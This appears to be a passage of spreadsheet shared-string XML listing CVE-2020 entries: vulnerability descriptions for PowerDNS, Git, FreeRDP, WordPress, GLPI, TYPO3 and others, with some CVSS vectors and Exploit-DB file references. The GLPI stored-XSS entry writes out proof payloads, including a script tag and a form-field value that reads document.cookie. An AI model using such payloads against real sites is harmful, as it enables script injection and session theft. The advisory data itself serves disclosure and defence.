    <t>CVE-2020-10995</t>
  </si>
  <si>
    <t>PowerDNS Recursor from 4.1.0 up to and including 4.3.0 does not sufficiently defend against amplification attacks. An issue in the DNS protocol has been found that allow malicious parties to use recursive DNS services to attack third party authoritative name servers. The attack uses a crafted reply by an authoritative name server to amplify the resulting traffic between the recursive and other authoritative name servers. Both types of service can suffer degraded performance as an effect. This is triggered by random subdomains in the NSDNAME in NS records. PowerDNS Recursor 4.1.16, 4.2.2 and 4.3.1 contain a mitigation to limit the impact of this DNS protocol issue.</t>
  </si>
  <si>
    <t>CVE-2020-10996</t>
  </si>
  <si>
    <t>An issue was discovered in Percona XtraDB Cluster before 5.7.28-31.41.2. A bundled script inadvertently sets a static transition_key for SST processes in place of the random key expected.</t>
  </si>
  <si>
    <t>CVE-2020-10997</t>
  </si>
  <si>
    <t>Percona XtraBackup before 2.4.20 unintentionally writes the command line to any resulting backup file output. This may include sensitive arguments passed at run time. In addition, when --history is passed at run time, this command line is also written to the PERCONA_SCHEMA.xtrabackup_history table.</t>
  </si>
  <si>
    <t>CVE-2020-1100</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1101, CVE-2020-1106.</t>
  </si>
  <si>
    <t>CVE-2020-11000</t>
  </si>
  <si>
    <t>GreenBrowser before version 1.2 has a vulnerability where apps that rely on URL Parsing to verify that a given URL is pointing to a trust server may be susceptible to many different ways to get URL parsing and verification wrong, which allows an attacker to circumvent the access control. This problem has been patched in version 1.2.</t>
  </si>
  <si>
    <t>CVE-2020-11001</t>
  </si>
  <si>
    <t>In Wagtail before versions 2.8.1 and 2.7.2, a cross-site scripting (XSS) vulnerability exists on the page revision comparison view within the Wagtail admin interface. A user with a limited-permission editor account for the Wagtail admin could potentially craft a page revision history that, when viewed by a user with higher privileges, could perform actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 2.7.2 (for the LTS 2.7 branch) and Wagtail 2.8.1 (for the current 2.8 branch).</t>
  </si>
  <si>
    <t>CVE-2020-11002</t>
  </si>
  <si>
    <t>dropwizard-validation before versions 2.0.3 and 1.3.21 has a remote code execution vulnerability. A server-side template injection was identified in the self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to Remote Code Execution (RCE) vulnerability. If you are using a self-validating bean an upgrade to Dropwizard 1.3.21/2.0.3 or later is strongly recommended. The changes introduced in Dropwizard 1.3.19 and 2.0.2 for CVE-2020-5245 unfortunately did not fix the underlying issue completely. The issue has been fixed in dropwizard-validation 1.3.21 and 2.0.3 or later. We strongly recommend upgrading to one of these versions.</t>
  </si>
  <si>
    <t>CVE-2020-11003</t>
  </si>
  <si>
    <t>Oasis before version 2.15.0 has a potential DNS rebinding or CSRF vulnerability. If you're running a vulnerable application on your computer and an attacker can trick you into visiting a malicious website, they could use DNS rebinding and CSRF attacks to read/write to vulnerable applications. This has been patched in 2.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-11004</t>
  </si>
  <si>
    <t>SQL Injection was discovered in Admidio before version 3.3.13. The main cookie parameter is concatenated into a SQL query without any input validation/sanitization, thus an attacker without logging in, can send a GET request with arbitrary SQL queries appended to the cookie parameter and execute SQL queries. The vulnerability impacts the confidentiality of the system. This has been patched in version 3.3.13.</t>
  </si>
  <si>
    <t>CVE-2020-11005</t>
  </si>
  <si>
    <t>The WindowsHello open source library (NuGet HaemmerElectronics.SeppPenner.WindowsHello), before version 1.0.4, has a vulnerability where encrypted data could potentially be decrypted without needing authentication. If the library is used to encrypt text and write the output to a txt file, another executable could be able to decrypt the text using the static method NCryptDecrypt from this same library without the need to use Windows Hello Authentication again. This has been patched in version 1.0.4.</t>
  </si>
  <si>
    <t>CVE-2020-11006</t>
  </si>
  <si>
    <t>In Shopizer before version 2.11.0, a script can be injected in various forms and saved in the database, then executed when information is fetched from backend. This has been patched in version 2.11.0.</t>
  </si>
  <si>
    <t>CVE-2020-11007</t>
  </si>
  <si>
    <t>In Shopizer before version 2.11.0, using API or Controller based versions negative quantity is not adequately validated hence creating incorrect shopping cart and order total. This vulnerability makes it possible to create a negative total in the shopping cart. This has been patched in version 2.11.0.</t>
  </si>
  <si>
    <t>CVE-2020-11008</t>
  </si>
  <si>
    <t>Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. This bug is similar to CVE-2020-5260(GHSA-qm7j-c969-7j4q). The fix for that bug still left the door open for an exploit where _some_ credential is leaked (but the attacker cannot control which one). Git uses external "credential helper" programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that are considered illegal as of the recently published Git versions can cause Git to send a "blank" pattern to helpers, missing hostname and protocol fields. Many helpers will interpret this as matching _any_ URL, and will return some unspecified stored password, leaking the password to an attacker's server. The vulnerability can be triggered by feeding a malicious URL to `git clone`. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The root of the problem is in Git itself, which should not be feeding blank input to helpers. However, the ability to exploit the vulnerability in practice depends on which helpers are in use. Credential helpers which are known to trigger the vulnerability: - Git's "store" helper - Git's "cache" helper - the "osxkeychain" helper that ships in Git's "contrib" directory Credential helpers which are known to be safe even with vulnerable versions of Git: - Git Credential Manager for Windows Any helper not in this list should be assumed to trigger the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11009</t>
  </si>
  <si>
    <t>In Rundeck before version 3.2.6, authenticated users can craft a request that reveals Execution data and logs and Job details that they are not authorized to see. Depending on the configuration and the way that Rundeck is used, this could result in anything between a high severity risk, or a very low risk. If access is tightly restricted and all users on the system have access to all projects, this is not really much of an issue. If access is wider and allows login for users that do not have access to any projects, or project access is restricted, there is a larger issue. If access is meant to be restricted and secrets, sensitive data, or intellectual property are exposed in Rundeck execution output and job data, the risk becomes much higher. This vulnerability is patched in version 3.2.6</t>
  </si>
  <si>
    <t>CVE-2020-1101</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1106.</t>
  </si>
  <si>
    <t>CVE-2020-11010</t>
  </si>
  <si>
    <t>In Tortoise ORM before versions 0.15.23 and 0.16.6, various forms of SQL injection have been found for MySQL and when filtering or doing mass-updates on char/text fields. SQLite &amp; PostgreSQL are only affected when filtering with contains, starts_with, or ends_with filters (and their case-insensitive counterparts).</t>
  </si>
  <si>
    <t>CVE-2020-11011</t>
  </si>
  <si>
    <t>In Phproject before version 1.7.8, there's a vulnerability which allows users with access to file uploads to execute arbitrary code. This is patched in version 1.7.8.</t>
  </si>
  <si>
    <t>CVE-2020-11012</t>
  </si>
  <si>
    <t>MinIO versions before RELEASE.2020-04-23T00-58-49Z have an authentication bypass issue in the MinIO admin API. Given an admin access key, it is possible to perform admin API operations i.e. creating new service accounts for existing access keys - without knowing the admin secret key. This has been fixed and released in version RELEASE.2020-04-23T00-58-49Z.</t>
  </si>
  <si>
    <t>CVE-2020-11013</t>
  </si>
  <si>
    <t>Their is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. `lookup` is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of `helm template` states that it does not attach to a remote cluster. However, a the recently added `lookup` template function circumvents this restriction and connects to the cluster even during `helm template` and `helm install|update|delete|rollback --dry-run`. The user is not notified of this behavior. Running `helm template` should not make calls to a cluster. This is different from `install`, which is presumed to have access to a cluster in order to load resources into Kubernetes. Helm 2 is unaffected by this vulnerability. A malicious chart author could inject a `lookup` into a chart that, when rendered through `helm template`, performs unannounced lookups against the cluster a user&amp;#39;s `KUBECONFIG` file points to. This information can then be disclosed via the output of `helm template`. This issue has been fixed in Helm 3.2.0</t>
  </si>
  <si>
    <t>CVE-2020-11014</t>
  </si>
  <si>
    <t>Electron-Cash-SLP before version 3.6.2 has a vulnerability. All token creators that use the "Mint Tool" feature of the Electron Cash SLP Edition are at risk of sending the minting authority baton to the wrong SLP address. Sending the mint baton to the wrong address will give another party the ability to issue new tokens or permanently destroy future minting capability. This is fixed version 3.6.2.</t>
  </si>
  <si>
    <t>CVE-2020-11015</t>
  </si>
  <si>
    <t>A vulnerability has been disclosed in thinx-device-api IoT Device Management Server before version 2.5.0. Device MAC address can be spoofed. This means initial registration requests without UDID and spoofed MAC address may pass to create new UDID with same MAC address. Full impact needs to be reviewed further. Applies to all (mostly ESP8266/ESP32) users. This has been fixed in firmware version 2.5.0.</t>
  </si>
  <si>
    <t>CVE-2020-11016</t>
  </si>
  <si>
    <t>IntelMQ Manager from version 1.1.0 and before version 2.1.1 has a vulnerability where the backend incorrectly handled messages given by user-input in the "send" functionality of the Inspect-tool of the Monitor component. An attacker with access to the IntelMQ Manager could possibly use this issue to execute arbitrary code with the privileges of the webserver. Version 2.1.1 fixes the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11017</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, by providing manipulated input a malicious client can create a double free condition and crash the server. This is fixed in version 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11018</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, a possible resource exhaustion vulnerability can be performed. Malicious clients could trigger out of bound reads causing memory allocation with random size. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11019</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-1102</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49766.txt</t>
  </si>
  <si>
    <t>jQuery 1.2 - Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>CVE-2020-11020</t>
  </si>
  <si>
    <t>Faye (NPM, RubyGem) versions greater than 0.5.0 and before 1.0.4, 1.1.3 and 1.2.5, has the potential for authentication bypass in the extension system. The vulnerability allows any client to bypass checks put in place by server-side extensions, by appending extra segments to the message channel. It is patched in versions 1.0.4, 1.1.3 and 1.2.5.</t>
  </si>
  <si>
    <t>CVE-2020-11021</t>
  </si>
  <si>
    <t>Actions Http-Client (NPM @actions/http-client) before version 1.0.8 can disclose Authorization headers to incorrect domain in certain redirect scenarios. The conditions in which this happens are if consumers of the http-client: 1. make an http request with an authorization header 2. that request leads to a redirect (302) and 3. the redirect url redirects to another domain or hostname Then the authorization header will get passed to the other domain. The problem is fixed in version 1.0.8.</t>
  </si>
  <si>
    <t>CVE-2020-11022</t>
  </si>
  <si>
    <t>In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.</t>
  </si>
  <si>
    <t>CVE-2020-11023</t>
  </si>
  <si>
    <t>In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing &lt;option&gt; elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.</t>
  </si>
  <si>
    <t>CVE-2020-11024</t>
  </si>
  <si>
    <t>In Moonlight iOS/tvOS before 4.0.1, the pairing process is vulnerable to a man-in-the-middle attack. The bug has been fixed in Moonlight v4.0.1 for iOS and tvOS.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-11025</t>
  </si>
  <si>
    <t>In affected versions of WordPress, a cross-site scripting (XSS) vulnerability in the navigation section of Customizer allows JavaScript code to be executed. Exploitation requires an authenticated user. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-11026</t>
  </si>
  <si>
    <t>In affected versions of WordPress, files with a specially crafted name when uploaded to the Media section can lead to script execution upon accessing the file. This requires an authenticated user with privileges to upload files. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-11027</t>
  </si>
  <si>
    <t>In affected versions of WordPress, a password reset link emailed to a user does not expire upon changing the user password. Access would be needed to the email account of the user by a malicious party for successful execution. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-11028</t>
  </si>
  <si>
    <t>In affected versions of WordPress, some private posts, which were previously public, can result in unauthenticated disclosure under a specific set of conditions. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-11029</t>
  </si>
  <si>
    <t>In affected versions of WordPress, a vulnerability in the stats() method of class-wp-object-cache.php can be exploited to execute cross-site scripting (XSS) attacks. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-1103</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists where certain modes of the search function in Microsoft SharePoint Server are vulnerable to cross-site search attacks (a variant of cross-site request forgery, CSRF).When users are simultaneously logged in to Microsoft SharePoint Server and visit a malicious web page, the attacker can, through standard browser functionality, induce the browser to invoke search queries as the logged in user, aka 'Microsoft SharePoint Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11030</t>
  </si>
  <si>
    <t>In affected versions of WordPress, a special payload can be crafted that can lead to scripts getting executed within the search block of the block editor. This requires an authenticated user with the ability to add content. This has been patched in version 5.4.1, along with all the previously affected versions via a minor release (5.3.3, 5.2.6, 5.1.5, 5.0.9, 4.9.14, 4.8.13, 4.7.17, 4.6.18, 4.5.21, 4.4.22, 4.3.23, 4.2.27, 4.1.30, 4.0.30, 3.9.31, 3.8.33, 3.7.33).</t>
  </si>
  <si>
    <t>CVE-2020-11031</t>
  </si>
  <si>
    <t>In GLPI before version 9.5.0, the encryption algorithm used is insecure. The security of the data encrypted relies on the password used, if a user sets a weak/predictable password, an attacker could decrypt data. This is fixed in version 9.5.0 by using a more secure encryption library. The library chosen is sodium.</t>
  </si>
  <si>
    <t>CVE-2020-11032</t>
  </si>
  <si>
    <t>In GLPI before version 9.4.6, there is a SQL injection vulnerability for all helpdesk instances. Exploiting this vulnerability requires a technician account. This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11033</t>
  </si>
  <si>
    <t>In GLPI from version 9.1 and before version 9.4.6, any API user with READ right on User itemtype will have access to full list of users when querying apirest.php/User. The response contains: - All api_tokens which can be used to do privileges escalations or read/update/delete data normally non accessible to the current user. - All personal_tokens can display another users planning. Exploiting this vulnerability requires the api to be enabled, a technician account. It can be mitigated by adding an application token. This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11034</t>
  </si>
  <si>
    <t>In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11035</t>
  </si>
  <si>
    <t>In GLPI after version 0.83.3 and before version 9.4.6, the CSRF tokens are generated using an insecure algorithm. The implementation uses rand and uniqid and MD5 which does not provide secure values. This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-11036</t>
  </si>
  <si>
    <t>In GLPI before version 9.4.6 there are multiple related stored XSS vulnerabilities. The package is vulnerable to Stored XSS in the comments of items in the Knowledge base. Adding a comment with content "&lt;script&gt;alert(1)&lt;/script&gt;" reproduces the attack. This can be exploited by a user with administrator privileges in the User-Agent field. It can also be exploited by an outside party through the following steps: 1. Create a user with the surname `" onmouseover="alert(document.cookie)` and an empty first name. 2. With this user, create a ticket 3. As an administrator (or other privileged user) open the created ticket 4. On the "last update" field, put your mouse on the name of the user 5. The XSS fires This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11037</t>
  </si>
  <si>
    <t>In Wagtail before versions 2.7.2 and 2.8.2, a potential timing attack exists on pages or documents that have been protected with a shared password through Wagtail's "Privacy" controls. This password check is performed through a character-by-character string comparison, and so an attacker who is able to measure the time taken by this check to a high degree of accuracy could potentially use timing differences to gain knowledge of the password. This is understood to be feasible on a local network, but not on the public internet. Privacy settings that restrict access to pages/documents on a per-user or per-group basis (as opposed to a shared password) are unaffected by this vulnerability. This has been patched in 2.7.3, 2.8.2, 2.9.</t>
  </si>
  <si>
    <t>CVE-2020-11038</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, an Integer Overflow to Buffer Overflow exists. When using /video redirection, a manipulated server can instruct the client to allocate a buffer with a smaller size than requested due to an integer overflow in size calculation. With later messages, the server can manipulate the client to write data out of bound to the previously allocated buffer. This has been patched in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11039</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, when using a manipulated server with USB redirection enabled (nearly) arbitrary memory can be read and written due to integer overflows in length checks. This has been patched in 2.1.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-1104</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1105, CVE-2020-1107.</t>
  </si>
  <si>
    <t>CVE-2020-11040</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, there is an out-of-bound data read from memory in clear_decompress_subcode_rlex, visualized on screen as color. This has been patched in 2.1.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-11041</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, an outside controlled array index is used unchecked for data used as configuration for sound backend (alsa, oss, pulse, ...). The most likely outcome is a crash of the client instance followed by no or distorted sound or a session disconnect. If a user cannot upgrade to the patched version, a workaround is to disable sound for the session. This has been patched in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11042</t>
  </si>
  <si>
    <t>In FreeRDP greater than 1.1 and before 2.0.0, there is an out-of-bounds read in update_read_icon_info. It allows reading a attacker-defined amount of client memory (32bit unsigned -&gt; 4GB) to an intermediate buffer. This can be used to crash the client or store information for later retrieval. This has been patched in 2.0.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2020-11043</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, there is an out-of-bounds read in rfx_process_message_tileset. Invalid data fed to RFX decoder results in garbage on screen (as colors). This has been patched in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11044</t>
  </si>
  <si>
    <t>In FreeRDP greater than 1.2 and before 2.0.0, a double free in update_read_cache_bitmap_v3_order crashes the client application if corrupted data from a manipulated server is parsed. This has been patched in 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-11045</t>
  </si>
  <si>
    <t>In FreeRDP after 1.0 and before 2.0.0, there is an out-of-bound read in in update_read_bitmap_data that allows client memory to be read to an image buffer. The result displayed on screen as colour.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-11046</t>
  </si>
  <si>
    <t>In FreeRDP after 1.0 and before 2.0.0, there is a stream out-of-bounds seek in update_read_synchronize that could lead to a later out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-11047</t>
  </si>
  <si>
    <t>In FreeRDP after 1.1 and before 2.0.0, there is an out-of-bounds read in autodetect_recv_bandwidth_measure_results. A malicious server can extract up to 8 bytes of client memory with a manipulated message by providing a short input and reading the measurement result data. This has been patched in 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-11048</t>
  </si>
  <si>
    <t>In FreeRDP after 1.0 and before 2.0.0, there is an out-of-bounds read. It only allows to abort a session. No data extraction is possible. This has been fixed in 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-11049</t>
  </si>
  <si>
    <t>In FreeRDP after 1.1 and before 2.0.0, there is an out-of-bound read of client memory that is then passed on to the protocol parser. This has been patched in 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-1105</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1107.</t>
  </si>
  <si>
    <t>CVE-2020-11050</t>
  </si>
  <si>
    <t>In Java-WebSocket less than or equal to 1.4.1, there is an Improper Validation of Certificate with Host Mismatch where WebSocketClient does not perform SSL hostname validation. This has been patched in 1.5.0.</t>
  </si>
  <si>
    <t>CVE-2020-11051</t>
  </si>
  <si>
    <t>In Wiki.js before 2.3.81, there is a stored XSS in the Markdown editor. An editor with write access to a page, using the Markdown editor, could inject an XSS payload into the content. If another editor (with write access as well) load the same page into the Markdown editor, the XSS payload will be executed as part of the preview panel. The rendered result does not contain the XSS payload as it is stripped by the HTML Sanitization security module. This vulnerability only impacts editors loading the malicious page in the Markdown editor. This has been patched in 2.3.81.</t>
  </si>
  <si>
    <t>CVE-2020-11052</t>
  </si>
  <si>
    <t>In Sorcery before 0.15.0, there is a brute force vulnerability when using password authentication via Sorcery. The brute force protection submodule will prevent a brute force attack for the defined lockout period, but once expired, protection will not be re-enabled until a user or malicious actor logs in successfully. This does not affect users that do not use the built-in brute force protection submodule, nor users that use permanent account lockout. This has been patched in 0.15.0.</t>
  </si>
  <si>
    <t>CVE-2020-11053</t>
  </si>
  <si>
    <t>In OAuth2 Proxy before 5.1.1, there is an open redirect vulnerability. Users can provide a redirect address for the proxy to send the authenticated user to at the end of the authentication flow. This is expected to be the original URL that the user was trying to access. This redirect URL is checked within the proxy and validated before redirecting the user to prevent malicious actors providing redirects to potentially harmful sites. However, by crafting a redirect URL with HTML encoded whitespace characters the validation could be bypassed and allow a redirect to any URL provided. This has been patched in 5.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-11054</t>
  </si>
  <si>
    <t>In qutebrowser versions less than 1.11.1, reloading a page with certificate errors shows a green URL. After a certificate error was overridden by the user, qutebrowser displays the URL as yellow (colors.statusbar.url.warn.fg). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (colors.statusbar.url.success_https). While the user already has seen a certificate error prompt at this point (or set content.ssl_strict to false, which is not recommended), this could still provide a false sense of security. This has been fixed in 1.11.1 and 1.12.0. All versions of qutebrowser are believed to be affected, though versions before v0.11.x couldn't be tested. Backported patches for older versions (greater than or equal to 1.4.0 and less than or equal to 1.10.2) are available, but no further releases are planned.</t>
  </si>
  <si>
    <t>684</t>
  </si>
  <si>
    <t>CVE-2020-11055</t>
  </si>
  <si>
    <t>In BookStack greater than or equal to 0.18.0 and less than 0.29.2, there is an XSS vulnerability in comment creation. A user with permission to create comments could POST HTML directly to the system to be saved in a comment, which would then be executed/displayed to others users viewing the comment. Through this vulnerability custom JavaScript code could be injected and therefore ran on other user machines. This most impacts scenarios where not-trusted users are given permission to create comments. This has been fixed in 0.29.2.</t>
  </si>
  <si>
    <t>CVE-2020-11056</t>
  </si>
  <si>
    <t>In Sprout Forms before 3.9.0, there is a potential Server-Side Template Injection vulnerability when using custom fields in Notification Emails which could lead to the execution of Twig code. This has been fixed in 3.9.0.</t>
  </si>
  <si>
    <t>CVE-2020-11057</t>
  </si>
  <si>
    <t>In XWiki Platform 7.2 through 11.10.2, registered users without scripting/programming permissions are able to execute python/groovy scripts while editing personal dashboards. This has been fixed 11.3.7 , 11.10.3 and 12.0.</t>
  </si>
  <si>
    <t>CVE-2020-11058</t>
  </si>
  <si>
    <t>In FreeRDP after 1.1 and before 2.0.0, a stream out-of-bounds seek in rdp_read_font_capability_set could lead to a later out-of-bounds read. As a result, a manipulated client or server might force a disconnect due to an invalid data read. This has been fixed in 2.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-11059</t>
  </si>
  <si>
    <t>In AEgir greater than or equal to 21.7.0 and less than 21.10.1, aegir publish and aegir build may leak secrets from environment variables in the browser bundle published to npm. This has been fixed in 21.10.1.</t>
  </si>
  <si>
    <t>CVE-2020-1106</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1099, CVE-2020-1100, CVE-2020-1101.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49992.py</t>
  </si>
  <si>
    <t>GLPI 9.4.5 - Remote Code Execution (RCE)</t>
  </si>
  <si>
    <t>2021-06-14</t>
  </si>
  <si>
    <t>CVE-2020-11060</t>
  </si>
  <si>
    <t>In GLPI before 9.4.6, an attacker can execute system commands by abusing the backup functionality. Theoretically, this vulnerability can be exploited by an attacker without a valid account by using a CSRF. Due to the difficulty of the exploitation, the attack is only conceivable by an account having Maintenance privileges and the right to add WIFI networks. This is fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11061</t>
  </si>
  <si>
    <t>In Bareos Director less than or equal to 16.2.10, 17.2.9, 18.2.8, and 19.2.7, a heap overflow allows a malicious client to corrupt the director's memory via oversized digest strings sent during initialization of a verify job. Disabling verify jobs mitigates the problem. This issue is also patched in Bareos versions 19.2.8, 18.2.9 and 17.2.10.</t>
  </si>
  <si>
    <t>CVE-2020-11062</t>
  </si>
  <si>
    <t>In GLPI after 0.68.1 and before 9.4.6, multiple reflexive XSS occur in Dropdown endpoints due to an invalid Content-Type. This has been fixed in version 9.4.6.</t>
  </si>
  <si>
    <t>CVE-2020-11063</t>
  </si>
  <si>
    <t>In TYPO3 CMS versions 10.4.0 and 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts. This has been fixed in 10.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-11064</t>
  </si>
  <si>
    <t>In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, it has been discovered that HTML placeholder attributes containing data of other database records are vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-11065</t>
  </si>
  <si>
    <t>In TYPO3 CMS greater than or equal to 9.5.12 and less than 9.5.17, and greater than or equal to 10.2.0 and less than 10.4.2, it has been discovered that link tags generated by typolink functionality are vulnerable to cross-site scripting; properties being assigned as HTML attributes have not been parsed correctly. This has been fixed in 9.5.17 and 10.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-11066</t>
  </si>
  <si>
    <t>In TYPO3 CMS greater than or equal to 9.0.0 and less than 9.5.17 and greater than or equal to 10.0.0 and less than 10.4.2, calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the web site (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects. This has been fixed in 9.5.17 and 10.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-11067</t>
  </si>
  <si>
    <t>In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that backend user settings (in $BE_USER-&gt;uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability. This has been fixed in 9.5.17 and 10.4.2.</t>
  </si>
  <si>
    <t>CVE-2020-11068</t>
  </si>
  <si>
